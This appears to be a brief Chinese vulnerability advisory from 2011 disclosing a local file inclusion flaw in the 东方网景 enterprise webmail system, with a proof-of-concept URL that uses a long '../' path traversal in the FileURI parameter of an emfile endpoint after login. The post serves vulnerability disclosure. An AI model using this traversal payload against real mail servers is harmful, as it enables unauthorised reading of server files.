东方网景企业邮箱系统包含漏洞
时间:2011-01-14 来源:evilboy
发布日期:2011-01.14
发布作者:evilboy
漏洞类型:文件包含
漏洞描述:东方网景企业邮箱系统存在本地文件包含漏洞。
测试方法:
POC:
注册登陆邮箱系统
mail.xxxx.com.cn/webmail/emfile?action=file&todo=displayfolderfiles&FileURI=%2F.Files%2F.test/../../../../../../../../../../%2C%2C0
截图如下:
标签分类:
相关阅读 更多 +
排行榜 更多 +